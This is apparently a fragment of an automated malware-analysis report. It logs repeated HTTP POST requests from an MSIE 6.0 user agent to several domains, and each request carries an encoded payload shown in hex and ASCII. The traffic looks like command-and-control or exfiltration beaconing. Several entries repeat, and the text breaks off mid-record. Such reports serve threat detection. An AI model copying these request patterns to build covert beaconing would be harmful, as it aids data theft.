fiTMJ9MFcf4GrfjOmlEZwnzXLBm58Po5t6D68M2wLdtFYyehgwv++GVddwyHu0NyZtej7ROwKx7safmRBoY2dIZVnPf8t5WqnlXjY1SWqBQ/IHRsah6YvRlAFz8f0Jz/94juZAUVNNZ61b8LHiKCF/OQ41PlBeCyUbnm+gvkawrliL26nZvgFCEpwnOFVRkAb4+Aj+xSVcWIqvlm/uPpcuonY6gY0892J38XdpBw8kuNH4v4Pj0/pmt0m689V3JoBhN8f/vbUsqEWiEeAAswomi3KD86kO0cMym36u1ebVeYiRv5rToylRFc3P0KWTTVLDfNoyjzdcHuRFlE1SogkB9uHNorHeNNnVsXdOXvEn7oi5RdmRA02p8pFSBXt3q/zDXdkVOrrflibfo44isiZ44wFj+JeDGFJbKbAqWsjRw9J5eCBc6lzdeCN75hERFo03eHA6UXMB3AdNN8/l20S2lBYUbm1nsUjyTOCD+FLTDkq2sFPy5e4UajBREl++q+X5pBtE9EDvs6NyHmnvP8Px7Ysy1I/KetJUM2MRhuVVco37qIMx/ntFMzahhI5FeEGjEw
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 5a 78 61 56 71 36 6d 64 66 66 37 75 64 32 35 76 65 45 6f 69 6d 38 4c 37 33 52 68 48 50 45 4e 56 37 62 70 45 6e 34 78 77 39 67 68 53 69 55 58 37 6f 7a 65 6e 6f 51 34 62 4b 53 2b 59 75 45 64 43 61 51 37 50 52 4d 66 44 68 33 69 30 71 53 71 71 55 7a 52 52 43 2f 52 4b 78 37 79 53 49 75 5a 69 5a 36 35 6a 36 46 5a 4b 50 70 71 6c 4c 44 4c 5a 6f 4e 4d 37 61 35 70 36 6b 46 52 49 77 2f 41 47 36 41 67 54 69 50 65 46 31 51 36 4e 43 45 69 5a 4b 5a 42 51 6a 35 64 65 30 46 37 36 30 4e 46 65 62 48 35 31 74 6a 6d 73 34 37 43 6d 71 53 2b 75 6c 53 39 2b 68 61 72 49 63 79 37 79 74 6a 50 6e 44 4a 6f 47 2b 48 43 4c 6d 5a 61 58 57 32 4b 6b 77 63 76 72 61 52 45 35 73 35 67 54 72 46 52 77 41 72 78 7a 65 58 64 63 6b 4e 47 2b 6b 64 61 37 6f 33 33 61 67 39 72 7a 6a 68 33 48 65 63 74 62 56 4f 33 66 71 48 42 38 5a 59 2b 6f 4f 4e 49 70 71 45 6f 58 44 65 56 30 45 6d 59 37 59 38 37 4a 73 47 51 57 53 5a 55 47 74 4c 58 44 67 56 48 41 53 30 69 36 4e 34 6c 49 72 4d 45 39 73 68 6c 71 68 62 79 78 6c 30 44 39 56 33 75 6c 63 32 64 67 49 70 5a 41 51 48 73 43 38 4d 2b 72 42 69 70 6e 59 49 65 72 4a 74 79 36 51 47 6e 4b 61 78 2f 42 62 50 4a 61 78 6e 52 37 4c 78 37 49 70 64 64 77 2b 62 56 55 46 53 70 59 43 42 37 56 56 41 79 4a 52 74 42 2f 6e 45 69 4a 54 76 32 5a 6b 4c 6a 48 66 4f 44 32 57 7a 6a 49 73 4e 34 6e 75 36 35 61 61 4d 42 2b 4f 37 76 78 56 38 6c 73 79 73 43 35 30 76 41 4b 53 52 36 58 67 4f 6a 2f 71 53 48 43 6a 55 56 4a 72 66 6c 71 34 34 72 31 56 73 4d 59 39 4b 4a 57 66 48 33 34 4c 4b 46 33 2f 49 30 51 42 30 70 73 55 76 69 37 58 2b 39 39 54 64 57 31 35 61 71 31 55 47 4d 71 6c 43 5a 48 38 43 6d 6f 74 79 68 52 4b 57 44 6c 59 70 6e 68 34 37 73 2b 66 32 64 4f 57 72 56 30 56 69 75 50 56 2b 54 41 42 66 42 6c 6e 75 48 38 33 46 4c 70 2f 45 58 69 53 72 4e 30 71 45 7a 51 77 41 3d 3d Data Ascii: ZxaVq6mdff7ud25veEoim8L73RhHPENV7bpEn4xw9ghSiUX7ozenoQ4bKS+YuEdCaQ7PRMfDh3i0qSqqUzRRC/RKx7ySIuZiZ65j6FZKPpqlLDLZoNM7a5p6kFRIw/AG6AgTiPeF1Q6NCEiZKZBQj5de0F760NFebH51tjms47CmqS+ulS9+harIcy7ytjPnDJoG+HCLmZaXW2KkwcvraRE5s5gTrFRwArxzeXdckNG+kda7o33ag9rzjh3HectbVO3fqHB8ZY+oONIpqEoXDeV0EmY7Y87JsGQWSZUGtLXDgVHAS0i6N4lIrME9shlqhbyxl0D9V3ulc2dgIpZAQHsC8M+rBipnYIerJty6QGnKax/BbPJaxnR7Lx7Ipddw+bVUFSpYCB7VVAyJRtB/nEiJTv2ZkLjHfOD2WzjIsN4nu65aaMB+O7vxV8lsysC50vAKSR6XgOj/qSHCjUVJrflq44r1VsMY9KJWfH34LKF3/I0QB0psUvi7X+99TdW15aq1UGMqlCZH8CmotyhRKWDlYpnh47s+f2dOWrV0ViuPV+TABfBlnuH83FLp/EXiSrN0qEzQwA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 45 79 5a 49 52 53 78 4c 65 76 36 68 72 79 4d 77 46 30 7a 6b 4f 54 2b 62 72 35 36 45 42 33 59 35 49 44 2f 65 4f 34 4d 77 66 38 30 77 4a 59 69 61 52 38 65 32 34 68 67 54 61 59 69 59 43 35 67 76 32 43 30 64 6b 68 50 31 73 36 53 39 31 35 2f 78 69 49 35 65 64 6a 64 41 56 57 43 77 46 41 47 46 2b 44 51 50 45 38 49 4d 42 41 58 4a 5a 2f 47 59 31 6a 49 54 35 2f 44 4a 51 55 4d 32 45 4b 66 35 37 61 73 75 49 79 65 74 70 59 4b 37 31 48 4c 62 64 73 77 73 36 58 53 62 74 4b 69 6e 67 6f 55 2f 48 39 66 6f 34 45 6f 68 62 46 61 56 61 57 36 77 41 47 45 2b 34 33 44 78 75 79 73 7a 4e 50 54 67 59 78 43 63 67 76 48 66 79 59 74 70 4b 47 35 39 65 4e 53 6c 55 47 71 68 77 63 7a 63 57 48 6c 6c 79 38 4e 39 68 57 4a 78 68 69 58 4a 2f 76 76 75 67 62 46 71 43 6f 69 47 69 31 51 7a 53 41 75 65 6f 34 4f 46 39 41 4c 31 78 65 4b 36 6e 55 37 4f 44 36 6d 6c 32 47 75 69 61 5a 48 78 73 52 4d 50 78 77 6b 4d 34 65 4d 47 6b 57 6a 4e 63 68 38 5a 6c 4b 4a 2f 6a 2b 62 4b 6d 2f 62 54 63 6a 4d 52 44 56 77 33 42 65 41 6a 7a 63 6f 42 62 45 41 6b 47 75 2f 6d 34 4c 67 36 49 5a 2b 6f 49 33 78 6c 42 4f 56 48 35 30 61 52 66 73 2b 37 38 49 35 61 76 6c 43 55 43 66 39 33 41 74 79 59 54 42 6f 42 68 72 4c 69 4a 52 62 53 72 41 51 4c 55 61 6b 49 31 4d 6c 77 79 7a 75 58 4a 69 79 45 64 59 57 38 61 4c 71 56 50 45 6e 4b 37 7a 49 62 6a 62 4e 71 73 67 54 6f 6d 34 54 7a 67 51 53 4a 57 39 73 41 4f 47 64 45 6e 73 4d 6e 69 42 4c 7a 4a 54 56 5a 6d 31 64 2b 62 35 65 6b 46 56 5a 47 53 43 50 36 47 55 4e 75 36 5a 39 74 5a 6c 36 72 62 65 67 73 4b 30 47 59 58 75 37 67 5a 68 57 6a 4f 36 6d 70 6c 51 6c 42 5a 42 33 37 38 59 52 5a 32 65 6b 74 41 2b 56 72 6f 6b 77 7a 73 68 37 52 4b 35 33 5a 59 59 59 42 51 63 72 51 64 62 6c 4e 48 78 59 56 4a 6b 36 74 77 6a 32 51 30 67 70 4a 55 78 33 73 Data Ascii: EyZIRSxLev6hryMwF0zkOT+br56EB3Y5ID/eO4Mwf80wJYiaR8e24hgTaYiYC5gv2C0dkhP1s6S915/xiI5edjdAVWCwFAGF+DQPE8IMBAXJZ/GY1jIT5/DJQUM2EKf57asuIyetpYK71HLbdsws6XSbtKingoU/H9fo4EohbFaVaW6wAGE+43DxuyszNPTgYxCcgvHfyYtpKG59eNSlUGqhwczcWHlly8N9hWJxhiXJ/vvugbFqCoiGi1QzSAueo4OF9AL1xeK6nU7OD6ml2GuiaZHxsRMPxwkM4eMGkWjNch8ZlKJ/j+bKm/bTcjMRDVw3BeAjzcoBbEAkGu/m4Lg6IZ+oI3xlBOVH50aRfs+78I5avlCUCf93AtyYTBoBhrLiJRbSrAQLUakI1MlwyzuXJiyEdYW8aLqVPEnK7zIbjbNqsgTom4TzgQSJW9sAOGdEnsMniBLzJTVZm1d+b5ekFVZGSCP6GUNu6Z9tZl6rbegsK0GYXu7gZhWjO6mplQlBZB378YRZ2ektA+Vrokwzsh7RK53ZYYYBQcrQdblNHxYVJk6twj2Q0gpJUx3s
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 66 69 54 4d 4a 39 4d 46 63 66 34 47 72 66 6a 4f 6d 6c 45 5a 77 6e 7a 58 4c 42 6d 35 38 50 6f 35 74 36 44 36 38 4d 32 77 4c 64 74 46 59 79 65 68 67 77 76 2b 2b 47 56 64 64 77 79 48 75 30 4e 79 5a 74 65 6a 37 52 4f 77 4b 78 37 73 61 66 6d 52 42 6f 59 32 64 49 5a 56 6e 50 66 38 74 35 57 71 6e 6c 58 6a 59 31 53 57 71 42 51 2f 49 48 52 73 61 68 36 59 76 52 6c 41 46 7a 38 66 30 4a 7a 2f 39 34 6a 75 5a 41 55 56 4e 4e 5a 36 31 62 38 4c 48 69 4b 43 46 2f 4f 51 34 31 50 6c 42 65 43 79 55 62 6e 6d 2b 67 76 6b 61 77 72 6c 69 4c 32 36 6e 5a 76 67 46 43 45 70 77 6e 4f 46 56 52 6b 41 62 34 2b 41 6a 2b 78 53 56 63 57 49 71 76 6c 6d 2f 75 50 70 63 75 6f 6e 59 36 67 59 30 38 39 32 4a 33 38 58 64 70 42 77 38 6b 75 4e 48 34 76 34 50 6a 30 2f 70 6d 74 30 6d 36 38 39 56 33 4a 6f 42 68 4e 38 66 2f 76 62 55 73 71 45 57 69 45 65 41 41 73 77 6f 6d 69 33 4b 44 38 36 6b 4f 30 63 4d 79 6d 33 36 75 31 65 62 56 65 59 69 52 76 35 72 54 6f 79 6c 52 46 63 33 50 30 4b 57 54 54 56 4c 44 66 4e 6f 79 6a 7a 64 63 48 75 52 46 6c 45 31 53 6f 67 6b 42 39 75 48 4e 6f 72 48 65 4e 4e 6e 56 73 58 64 4f 58 76 45 6e 37 6f 69 35 52 64 6d 52 41 30 32 70 38 70 46 53 42 58 74 33 71 2f 7a 44 58 64 6b 56 4f 72 72 66 6c 69 62 66 6f 34 34 69 73 69 5a 34 34 77 46 6a 2b 4a 65 44 47 46 4a 62 4b 62 41 71 57 73 6a 52 77 39 4a 35 65 43 42 63 36 6c 7a 64 65 43 4e 37 35 68 45 52 46 6f 30 33 65 48 41 36 55 58 4d 42 33 41 64 4e 4e 38 2f 6c 32 30 53 32 6c 42 59 55 62 6d 31 6e 73 55 6a 79 54 4f 43 44 2b 46 4c 54 44 6b 71 32 73 46 50 79 35 65 34 55 61 6a 42 52 45 6c 2b 2b 71 2b 58 35 70 42 74 45 39 45 44 76 73 36 4e 79 48 6d 6e 76 50 38 50 78 37 59 73 79 31 49 2f 4b 65 74 4a 55 4d 32 4d 52 68 75 56 56 63 6f 33 37 71 49 4d 78 2f 6e 74 46 4d 7a 61 68 68 49 35 46 65 45 47 6a 45 77 Data Ascii: fiTMJ9MFcf4GrfjOmlEZwnzXLBm58Po5t6D68M2wLdtFYyehgwv++GVddwyHu0NyZtej7ROwKx7safmRBoY2dIZVnPf8t5WqnlXjY1SWqBQ/IHRsah6YvRlAFz8f0Jz/94juZAUVNNZ61b8LHiKCF/OQ41PlBeCyUbnm+gvkawrliL26nZvgFCEpwnOFVRkAb4+Aj+xSVcWIqvlm/uPpcuonY6gY0892J38XdpBw8kuNH4v4Pj0/pmt0m689V3JoBhN8f/vbUsqEWiEeAAswomi3KD86kO0cMym36u1ebVeYiRv5rToylRFc3P0KWTTVLDfNoyjzdcHuRFlE1SogkB9uHNorHeNNnVsXdOXvEn7oi5RdmRA02p8pFSBXt3q/zDXdkVOrrflibfo44isiZ44wFj+JeDGFJbKbAqWsjRw9J5eCBc6lzdeCN75hERFo03eHA6UXMB3AdNN8/l20S2lBYUbm1nsUjyTOCD+FLTDkq2sFPy5e4UajBREl++q+X5pBtE9EDvs6NyHmnvP8Px7Ysy1I/KetJUM2MRhuVVco37qIMx/ntFMzahhI5FeEGjEw
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 5a 78 61 56 71 36 6d 64 66 66 37 75 64 32 35 76 65 45 6f 69 6d 38 4c 37 33 52 68 48 50 45 4e 56 37 62 70 45 6e 34 78 77 39 67 68 53 69 55 58 37 6f 7a 65 6e 6f 51 34 62 4b 53 2b 59 75 45 64 43 61 51 37 50 52 4d 66 44 68 33 69 30 71 53 71 71 55 7a 52 52 43 2f 52 4b 78 37 79 53 49 75 5a 69 5a 36 35 6a 36 46 5a 4b 50 70 71 6c 4c 44 4c 5a 6f 4e 4d 37 61 35 70 36 6b 46 52 49 77 2f 41 47 36 41 67 54 69 50 65 46 31 51 36 4e 43 45 69 5a 4b 5a 42 51 6a 35 64 65 30 46 37 36 30 4e 46 65 62 48 35 31 74 6a 6d 73 34 37 43 6d 71 53 2b 75 6c 53 39 2b 68 61 72 49 63 79 37 79 74 6a 50 6e 44 4a 6f 47 2b 48 43 4c 6d 5a 61 58 57 32 4b 6b 77 63 76 72 61 52 45 35 73 35 67 54 72 46 52 77 41 72 78 7a 65 58 64 63 6b 4e 47 2b 6b 64 61 37 6f 33 33 61 67 39 72 7a 6a 68 33 48 65 63 74 62 56 4f 33 66 71 48 42 38 5a 59 2b 6f 4f 4e 49 70 71 45 6f 58 44 65 56 30 45 6d 59 37 59 38 37 4a 73 47 51 57 53 5a 55 47 74 4c 58 44 67 56 48 41 53 30 69 36 4e 34 6c 49 72 4d 45 39 73 68 6c 71 68 62 79 78 6c 30 44 39 56 33 75 6c 63 32 64 67 49 70 5a 41 51 48 73 43 38 4d 2b 72 42 69 70 6e 59 49 65 72 4a 74 79 36 51 47 6e 4b 61 78 2f 42 62 50 4a 61 78 6e 52 37 4c 78 37 49 70 64 64 77 2b 62 56 55 46 53 70 59 43 42 37 56 56 41 79 4a 52 74 42 2f 6e 45 69 4a 54 76 32 5a 6b 4c 6a 48 66 4f 44 32 57 7a 6a 49 73 4e 34 6e 75 36 35 61 61 4d 42 2b 4f 37 76 78 56 38 6c 73 79 73 43 35 30 76 41 4b 53 52 36 58 67 4f 6a 2f 71 53 48 43 6a 55 56 4a 72 66 6c 71 34 34 72 31 56 73 4d 59 39 4b 4a 57 66 48 33 34 4c 4b 46 33 2f 49 30 51 42 30 70 73 55 76 69 37 58 2b 39 39 54 64 57 31 35 61 71 31 55 47 4d 71 6c 43 5a 48 38 43 6d 6f 74 79 68 52 4b 57 44 6c 59 70 6e 68 34 37 73 2b 66 32 64 4f 57 72 56 30 56 69 75 50 56 2b 54 41 42 66 42 6c 6e 75 48 38 33 46 4c 70 2f 45 58 69 53 72 4e 30 71 45 7a 51 77 41 3d 3d Data Ascii: ZxaVq6mdff7ud25veEoim8L73RhHPENV7bpEn4xw9ghSiUX7ozenoQ4bKS+YuEdCaQ7PRMfDh3i0qSqqUzRRC/RKx7ySIuZiZ65j6FZKPpqlLDLZoNM7a5p6kFRIw/AG6AgTiPeF1Q6NCEiZKZBQj5de0F760NFebH51tjms47CmqS+ulS9+harIcy7ytjPnDJoG+HCLmZaXW2KkwcvraRE5s5gTrFRwArxzeXdckNG+kda7o33ag9rzjh3HectbVO3fqHB8ZY+oONIpqEoXDeV0EmY7Y87JsGQWSZUGtLXDgVHAS0i6N4lIrME9shlqhbyxl0D9V3ulc2dgIpZAQHsC8M+rBipnYIerJty6QGnKax/BbPJaxnR7Lx7Ipddw+bVUFSpYCB7VVAyJRtB/nEiJTv2ZkLjHfOD2WzjIsN4nu65aaMB+O7vxV8lsysC50vAKSR6XgOj/qSHCjUVJrflq44r1VsMY9KJWfH34LKF3/I0QB0psUvi7X+99TdW15aq1UGMqlCZH8CmotyhRKWDlYpnh47s+f2dOWrV0ViuPV+TABfBlnuH83FLp/EXiSrN0qEzQwA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 33 71 6a 76 38 32 6c 48 69 50 34 41 59 59 66 70 4f 47 6b 50 62 34 49 4c 36 56 59 48 79 64 6c 74 72 53 41 36 51 4f 39 34 6f 30 38 7a 77 58 2b 39 61 77 54 63 4c 78 68 38 32 44 57 4a 44 56 69 4c 62 4a 6f 34 4b 51 6a 43 49 36 2f 62 32 53 50 32 41 76 77 43 47 79 43 42 49 57 59 6f 58 49 46 73 6a 58 69 71 32 47 52 4a 6d 67 42 4a 32 69 62 58 7a 51 53 79 69 6a 34 64 57 42 69 77 30 74 68 36 66 66 4d 73 44 50 65 4b 46 57 52 54 6e 4a 37 35 51 63 63 30 31 63 68 78 56 6a 62 66 68 43 6e 53 58 67 6e 51 6b 4e 39 33 41 51 4e 2b 57 37 36 73 2f 35 58 6f 6a 32 46 4a 32 48 68 4b 36 51 67 53 36 66 38 58 41 51 63 6c 4b 6e 71 74 4f 33 65 73 7a 4e 6a 71 63 45 76 6e 2b 59 31 49 46 52 6c 36 61 57 6d 75 59 54 66 54 61 74 30 67 45 77 57 78 54 5a 78 55 4b 39 70 44 5a 47 62 6f 51 4d 45 32 57 62 37 68 46 79 73 4d 73 73 4b 36 37 72 43 4e 4a 2b 78 4d 44 57 6d 6c 53 74 48 6e 75 52 70 39 35 4f 62 71 56 39 72 34 67 59 6d 58 43 66 39 4b 62 54 32 34 56 38 46 69 6a 4b 53 65 6c 78 39 6c 6f 30 70 46 70 65 6c 6b 59 37 72 2f 6e 45 6e 4e 4f 37 79 48 4f 58 46 43 7a 69 69 78 36 31 41 42 34 7a 31 7a 70 65 42 55 68 34 73 69 79 74 47 62 49 37 52 72 49 5a 63 79 78 76 6f 33 46 46 6c 48 55 37 42 6d 5a 52 54 42 67 37 4e 78 77 6e 79 6c 4c 53 55 36 6c 56 34 4f 78 57 52 4b 4d 61 74 57 4c 4c 51 4a 43 36 4d 37 76 79 36 75 51 48 57 76 62 2f 31 53 71 6b 50 56 69 68 36 4d 48 36 4e 76 39 33 50 35 63 79 71 56 36 61 76 6b 4c 65 53 6b 79 35 4e 47 34 39 46 68 59 6c 67 71 47 55 54 5a 65 4c 33 50 6b 7a 65 2f 6a 47 6e 35 33 41 50 53 46 43 62 4d 4c 42 59 39 76 6e 43 31 32 71 69 67 30 68 6d 76 76 63 2f 76 4e 58 6a 43 4e 4f 70 73 46 65 79 69 6d 77 3d 3d Data Ascii: 3qjv82lHiP4AYYfpOGkPb4IL6VYHydltrSA6QO94o08zwX+9awTcLxh82DWJDViLbJo4KQjCI6/b2SP2AvwCGyCBIWYoXIFsjXiq2GRJmgBJ2ibXzQSyij4dWBiw0th6ffMsDPeKFWRTnJ75Qcc01chxVjbfhCnSXgnQkN93AQN+W76s/5Xoj2FJ2HhK6QgS6f8XAQclKnqtO3eszNjqcEvn+Y1IFRl6aWmuYTfTat0gEwWxTZxUK9pDZGboQME2Wb7hFysMssK67rCNJ+xMDWmlStHnuRp95ObqV9r4gYmXCf9KbT24V8FijKSelx9lo0pFpelkY7r/nEnNO7yHOXFCziix61AB4z1zpeBUh4siytGbI7RrIZcyxvo3FFlHU7BmZRTBg7NxwnylLSU6lV4OxWRKMatWLLQJC6M7vy6uQHWvb/1SqkPVih6MH6Nv93P5cyqV6avkLeSky5NG49FhYlgqGUTZeL3Pkze/jGn53APSFCbMLBY9vnC12qig0hmvvc/vNXjCNOpsFeyimw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 69 2b 57 43 43 74 47 79 67 50 37 57 75 30 56 61 63 45 32 67 35 69 70 54 51 57 2b 50 58 45 72 57 6c 5a 59 43 30 66 5a 31 71 37 57 78 51 77 56 65 58 38 37 70 65 78 35 68 36 31 4d 45 35 6d 6b 58 71 68 2f 50 58 45 74 72 74 6a 45 66 61 75 64 43 34 70 77 64 61 43 52 69 53 64 44 34 34 65 58 68 32 49 32 65 57 34 78 53 51 44 62 43 58 6c 77 76 6b 42 38 46 6e 6e 61 6d 33 4b 71 52 68 38 68 6a 4a 79 64 53 49 4d 6d 55 4c 56 66 6c 46 6c 53 33 53 6b 4d 51 71 63 7a 66 6d 42 54 34 45 51 39 43 58 6b 74 33 6e 49 48 6b 39 6b 31 67 47 6f 73 51 75 2b 41 72 32 75 54 54 6d 65 38 6a 33 31 75 68 77 4f 37 51 73 48 32 71 42 4a 6b 44 50 52 30 30 6a 42 56 35 74 41 32 32 32 73 56 77 5a 42 71 77 64 34 61 69 6d 69 42 6a 2f 6c 4c 4c 39 37 53 4b 41 51 57 35 68 58 79 4e 51 61 6a 62 4a 31 33 48 71 76 47 76 36 36 34 61 6f 5a 44 65 38 67 61 62 34 79 55 6a 77 6a 51 32 52 50 72 72 55 63 70 69 31 43 70 5a 6c 6b 4d 33 75 41 5a 6a 75 39 36 36 66 74 4f 71 4a 6d 37 78 30 38 59 64 66 70 61 33 64 30 6d 74 38 6e 67 73 53 41 4c 6f 41 53 7a 74 35 34 2f 75 53 34 32 73 38 6d 64 4d 77 48 66 55 57 33 75 54 56 52 57 31 39 76 50 74 6f 72 56 63 75 38 56 34 44 6a 62 4d 50 79 66 61 66 35 46 6b 4f 6b 49 61 37 4d 61 5a 68 44 4f 38 4f 6b 57 56 32 65 43 65 58 62 69 39 4c 37 54 62 39 78 64 61 74 30 2b 37 72 76 35 31 2f 45 71 42 4f 4a 67 39 6c 54 74 52 58 53 71 6b 6f 48 55 2b 2f 4b 66 74 4e 46 30 31 56 38 62 35 4c 58 36 6d 65 4d 6f 6b 50 55 31 72 58 6d 30 6f 79 48 4d 2b 37 37 59 4c 56 6b 4f 48 54 36 6d 33 4c 2f 54 54 79 35 51 39 75 77 71 76 65 53 77 33 59 50 57 74 2f 53 79 35 2b 66 63 46 79 41 52 2f 4d 4e 6a 30 7a 6d 4b 58 53 70 2f 77 48 7a 52 4b 41 73 6b 38 5a 49 45 4e 4d 32 79 61 48 41 68 72 4d 59 5a 43 6d 5a 62 65 72 55 62 2f 4c 67 35 36 74 51 61 65 78 78 59 43 52 51 37 32 59 41 3d 3d Data Ascii: i+WCCtGygP7Wu0VacE2g5ipTQW+PXErWlZYC0fZ1q7WxQwVeX87pex5h61ME5mkXqh/PXEtrtjEfaudC4pwdaCRiSdD44eXh2I2eW4xSQDbCXlwvkB8Fnnam3KqRh8hjJydSIMmULVflFlS3SkMQqczfmBT4EQ9CXkt3nIHk9k1gGosQu+Ar2uTTme8j31uhwO7QsH2qBJkDPR00jBV5tA222sVwZBqwd4aimiBj/lLL97SKAQW5hXyNQajbJ13HqvGv664aoZDe8gab4yUjwjQ2RPrrUcpi1CpZlkM3uAZju966ftOqJm7x08Ydfpa3d0mt8ngsSALoASzt54/uS42s8mdMwHfUW3uTVRW19vPtorVcu8V4DjbMPyfaf5FkOkIa7MaZhDO8OkWV2eCeXbi9L7Tb9xdat0+7rv51/EqBOJg9lTtRXSqkoHU+/KftNF01V8b5LX6meMokPU1rXm0oyHM+77YLVkOHT6m3L/TTy5Q9uwqveSw3YPWt/Sy5+fcFyAR/MNj0zmKXSp/wHzRKAsk8ZIENM2yaHAhrMYZCmZberUb/Lg56tQaexxYCRQ72YA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 58 71 32 69 38 2b 31 45 69 50 36 4e 6f 64 48 32 35 4f 48 31 4c 36 62 58 34 71 62 62 50 6d 50 30 63 5a 78 66 74 61 46 67 67 42 62 4d 49 64 44 6d 6d 43 72 79 74 48 33 30 41 46 36 79 73 74 64 4d 68 43 44 5a 6e 4e 64 4b 79 6b 43 57 63 44 35 52 6d 49 56 42 45 4b 55 75 4d 35 75 59 59 56 32 2f 61 58 46 56 4c 35 79 69 61 64 46 43 4d 30 65 4f 46 63 77 6e 2f 65 7a 66 7a 4d 56 65 67 76 43 36 2b 46 56 4f 41 61 74 6a 63 62 47 4c 37 76 54 71 4d 68 66 52 56 6f 4f 39 53 49 35 49 34 4a 30 2f 65 59 42 50 4f 42 4d 43 4a 70 6f 67 78 67 61 71 73 35 6c 48 72 6d 69 6a 68 68 50 50 38 38 71 50 7a 41 35 48 71 35 49 73 51 47 6f 77 31 7a 65 68 52 58 48 4b 53 58 2f 65 6a 34 55 43 2f 65 69 65 43 2b 65 6a 65 4e 69 63 62 42 68 43 77 77 78 30 30 2b 70 2f 52 67 51 73 37 38 6a 4f 6a 69 4b 34 33 76 55 45 4d 34 4e 49 67 58 2b 57 70 2b 66 4a 6c 57 42 51 69 71 2b 78 33 62 37 2f 78 66 6b 31 78 47 54 55 66 38 5a 4b 4e 38 6f 7a 78 54 78 4a 73 4d 34 54 63 6d 49 33 52 31 63 4a 6d 58 30 61 37 67 6f 54 58 38 4d 68 53 71 68 77 61 71 31 2f 34 2b 74 31 2b 79 4f 55 59 34 6b 39 4c 6a 72 37 65 6a 51 7a 6a 67 33 44 54 7a 2f 7a 50 44 69 6d 45 31 45 71 33 70 72 45 37 6c 4c 2b 33 57 2f 78 35 50 35 78 35 79 68 49 62 6c 57 4e 65 65 66 46 36 66 79 34 51 47 4d 71 72 4c 79 4c 2b 41 39 59 34 78 37 4f 58 77 39 48 61 77 61 46 5a 4a 54 4b 47 69 69 37 4c 4b 6a 56 4e 79 71 52 63 36 62 53 6c 53 39 6c 33 50 66 6a 4d 6a 43 77 32 66 4b 41 71 6d 4a 62 4c 73 5a 36 57 2b 69 75 52 62 4b 6e 47 6c 67 39 58 6a 76 69 5a 62 62 41 2b 31 71 78 2f 49 35 34 6c 48 63 70 43 75 78 36 76 2f 59 52 6f 6a 2b 77 4b 48 71 44 35 4d 59 5a 41 30 67 6f 64 70 64 73 77 36 6e 43 54 4e 7a 4b 6b 34 66 75 58 55 70 67 2f 75 53 6b 43 76 4d 4d 76 4a 66 6e 32 68 63 59 59 66 56 61 76 4a 68 6a Data Ascii: Xq2i8+1EiP6NodH25OH1L6bX4qbbPmP0cZxftaFggBbMIdDmmCrytH30AF6ystdMhCDZnNdKykCWcD5RmIVBEKUuM5uYYV2/aXFVL5yiadFCM0eOFcwn/ezfzMVegvC6+FVOAatjcbGL7vTqMhfRVoO9SI5I4J0/eYBPOBMCJpogxgaqs5lHrmijhhPP88qPzA5Hq5IsQGow1zehRXHKSX/ej4UC/eieC+ejeNicbBhCwwx00+p/RgQs78jOjiK43vUEM4NIgX+Wp+fJlWBQiq+x3b7/xfk1xGTUf8ZKN8ozxTxJsM4TcmI3R1cJmX0a7goTX8MhSqhwaq1/4+t1+yOUY4k9Ljr7ejQzjg3DTz/zPDimE1Eq3prE7lL+3W/x5P5x5yhIblWNeefF6fy4QGMqrLyL+A9Y4x7OXw9HawaFZJTKGii7LKjVNyqRc6bSlS9l3PfjMjCw2fKAqmJbLsZ6W+iuRbKnGlg9XjviZbbA+1qx/I54lHcpCux6v/YRoj+wKHqD5MYZA0godpdsw6nCTNzKk4fuXUpg/uSkCvMMvJfn2hcYYfVavJhj
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 45 79 5a 49 52 53 78 4c 65 76 36 68 72 79 4d 77 46 30 7a 6b 4f 54 2b 62 72 35 36 45 42 33 59 35 49 44 2f 65 4f 34 4d 77 66 38 30 77 4a 59 69 61 52 38 65 32 34 68 67 54 61 59 69 59 43 35 67 76 32 43 30 64 6b 68 50 31 73 36 53 39 31 35 2f 78 69 49 35 65 64 6a 64 41 56 57 43 77 46 41 47 46 2b 44 51 50 45 38 49 4d 42 41 58 4a 5a 2f 47 59 31 6a 49 54 35 2f 44 4a 51 55 4d 32 45 4b 66 35 37 61 73 75 49 79 65 74 70 59 4b 37 31 48 4c 62 64 73 77 73 36 58 53 62 74 4b 69 6e 67 6f 55 2f 48 39 66 6f 34 45 6f 68 62 46 61 56 61 57 36 77 41 47 45 2b 34 33 44 78 75 79 73 7a 4e 50 54 67 59 78 43 63 67 76 48 66 79 59 74 70 4b 47 35 39 65 4e 53 6c 55 47 71 68 